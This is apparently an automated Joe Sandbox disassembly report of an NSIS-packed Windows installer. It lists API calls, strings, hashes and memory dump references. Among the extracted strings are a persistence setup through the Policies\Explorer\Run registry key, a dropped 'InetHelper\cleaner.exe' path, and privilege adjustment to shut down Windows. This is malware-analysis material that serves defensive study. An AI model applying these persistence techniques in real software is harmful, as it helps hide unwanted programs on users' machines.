                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004D5000,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D5000,00001FFB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,\Temp), ref: 00403705
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D5000,004D5000,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,Low), ref: 00403721
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D5000,004D5000,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D5000,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004D1000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,~nsu), ref: 0040384D
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,0040A328), ref: 0040385C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,.tmp), ref: 00403867
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004D5000,004CD000,004D5000,.tmp,004D5000,~nsu,004C1000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D5000,004D5000,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(004326E8,004326E8,?,00471000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                                              • CopyFileW.KERNEL32(004DD000,004326E8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,004326E8,004326E8,?,004326E8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu$&C
                                                                                                                                                                                                              • API String ID: 424501083-3710082758
                                                                                                                                                                                                              • Opcode ID: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction ID: a55e1ba19ca46540f0e819ab7f1242b390505e394ddfc82397b04f5546c7078a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1D671600310AAD7206F769D49B3B3AACEB4074AF10443FF985B62D2DBBD8D45876E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              [Figure: control-flow graph of the function starting at 405afa; legend: executed / not executed]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004D5000,74DF2EE0,00000000), ref: 00405B23
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00456730,\*.*), ref: 00405B6B
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405B94
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00456730,?,?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405BA4
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                              • String ID: 0gE$\*.*
                                                                                                                                                                                                              • API String ID: 2035342205-2711052210
                                                                                                                                                                                                              • Opcode ID: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                              • Instruction ID: db7c1e1462c3060b38713ca1582bdc14a6091e72a68d91c70f93002fb38cedfa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7941F230805B18A6EB20AB618C89BAF7778DF41718F10813BF805711D2D77C59C28EAE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              [Figure: control-flow graph of the function starting at 406af2; legend: executed / not executed]
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004D5000,0045E778,0045A730,00405E0E,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00406736
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                              • String ID: xE
                                                                                                                                                                                                              • API String ID: 2295610775-407097786
                                                                                                                                                                                                              • Opcode ID: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                              • Instruction ID: fc51c24eb8738f718e6fd544cb5c99b56e4f1c2878dc56694a5fb172fd41157c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D012315150205BD2011738AD4C85B7A589F153367218B37B866F61E0C7348C62869C
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              [Figure: control-flow graph of the function starting at 403ad8; legend: executed / not executed]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,004D5000,74DF3420,004C1000,00000000), ref: 00403AF2
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D1000,00446728), ref: 00403B59
                                                                                                                                                                                                              • lstrlenW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000,00000002,004D5000), ref: 00403BD9
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000), ref: 00403BEC
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run), ref: 00403BF7
                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C5000), ref: 00403C40
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403C7D
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004681E0), ref: 00403D2C
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004681E0), ref: 00403D39
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403D42
                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: (gD$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$_Nb
                                                                                                                                                                                                              • API String ID: 606308-2610290127
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004DD000,00002000), ref: 00402F60
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004E1000,00000000,004CD000,004CD000,004DD000,004DD000,80000000,00000003), ref: 00402FA9
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                                                                                                                              • soft, xrefs: 00403020
                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                                                                                                              • Null, xrefs: 00403029
                                                                                                                                                                                                              • HA, xrefs: 004030F6
                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                                                                                                              • Inst, xrefs: 00403017
                                                                                                                                                                                                              • *:o, xrefs: 004031B5
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                              • String ID: *:o$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$HA$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                              • API String ID: 2803837635-1291305336
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000), ref: 0040654B
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040655E
                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040659A
                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run), ref: 004065A8
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                                              • lstrcatW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                                              • lstrlenW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,0043E708,?,00405487,0043E708,00000000), ref: 00406631
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                              • API String ID: 717251189-3045395167
                                                                                                                                                                                                              • Opcode ID: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction ID: 4ff03c26a92b18a500a2dba0a5346c99a5613c7aa05bf40b8fc1f2faf6c00e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59612271A00101ABDF209F64DD85AAE37A5AF50314F22813FE507BA2D1EB3D8EA1C75D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,InetHelper,InetHelper,00000000,00000000,InetHelper,004C9000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$InetHelper$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 1941528284-122770931
                                                                                                                                                                                                              • Opcode ID: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction ID: ededab686cc318fc7e7b90f4c09e4a826d398c1608d56966c744d50d12e1e378
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841B571900518BADF107BA5CD85DAF3679EF4532DB20423FF416B10E2DB3C8A929A6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(006F3A2A,00000000,00000000,004266D0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • HA, xrefs: 004033A9
                                                                                                                                                                                                              • 5=B, xrefs: 004033AE, 004033C7
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00403337, 004033D2
                                                                                                                                                                                                              • *:o, xrefs: 004032E1, 004033FE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                                                                                              • String ID: *:o$5=B$HA$timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 1092082344-71510955
                                                                                                                                                                                                              • Opcode ID: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction ID: fd4332e341476289c3f76e81f79fa789cc737db0b0adfb813ccc5192894bdc6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231B171600211DBC7209F26FE8496A3BA8F7643567C9423BEC40B62E0CB385D11DB1E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
